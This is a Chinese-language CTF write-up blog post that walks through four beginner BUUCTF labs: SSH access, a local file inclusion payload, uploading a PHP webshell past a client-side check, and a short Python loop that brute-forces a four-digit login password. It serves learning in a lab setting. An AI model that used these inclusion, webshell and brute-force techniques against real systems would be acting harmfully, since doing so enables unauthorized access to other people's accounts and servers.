BUUCTF basic Linux Labs & BUU LFI COURSE 1 & Upload-Labs-Linux & BUU BRUTE 1

  • Post author:
  • Post category:linux



目录


Linux Labs


BUU LFI COURSE 1


Upload-Labs-Linux


BUU BRUTE 1


Linux Labs

启动靶机发现什么也没有,读题感觉应该是需要ssh连接一个linux主机,打开kali虚拟机,根据给出的端口和地址写入linux指令。

ssh -p 25142 root@node4.buuoj.cn

75734cbb53104f28969a790ab86e6d6b.bmp

ssh连接后先退回到根目录,发现有一个flag.txt,cat指令读取,拿到flag。

0002d68b1dfc4313a2e6618d6e047ced.bmp

BUU LFI COURSE 1

启动靶机,发现需要代码审计,运用文件包含,在url后面用问号传参来读取敏感文件。

?file=/flag

Upload-Labs-Linux

启动靶机,发现就是upload_labs的靶场,打开第一关,禁用js(火狐浏览器禁用步骤:新建页面搜索about:config,在页面中查找javascript.enable,把true改成false),上传php一句话木马,蚁剑连接后在根目录打开flag,这个题比较简单,结束后不要忘记启用js哦。

BUU BRUTE 1

启动靶机,发现是一个登录框,首先尝试弱密码admin/admin

e3c1213c9438491b9a8bde875b54f5cb.bmp

猜测用户名应该是正确,但密码是错误的,需要输入四位数字,把用户名改成admin1尝试

b57998c2eaac41de9afe65a89378a7df.bmp

方法一:说明我们的猜测正确,直接打开burp抓包,用户名为admin,爆破四位数字的密码段。需要把线程调小一点。

方法二:这个我参照了大佬的方法,编写脚本:(需要改成自己的url)

import requests
from time import sleep
url = "http://8120f277-af07-42cb-8718-50ba405df6ae.node4.buuoj.cn:81/?username=admin1&password="
for i in range(6400, 7000):
    res = requests.get(url + str(i))
    sleep(0.01)
    print("[*] Try:", i)
    if res.text != "密码错误,为四位数字。":
        print(res.text)
        break

两个方法可以都尝试一下,第一个我设置线程为1的时候不会有任何报错。第二个直接用大佬的方法会不定时报错,我自己加了个sleep函数,测试几遍并没有问题



版权声明:本文为m0_64558270原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。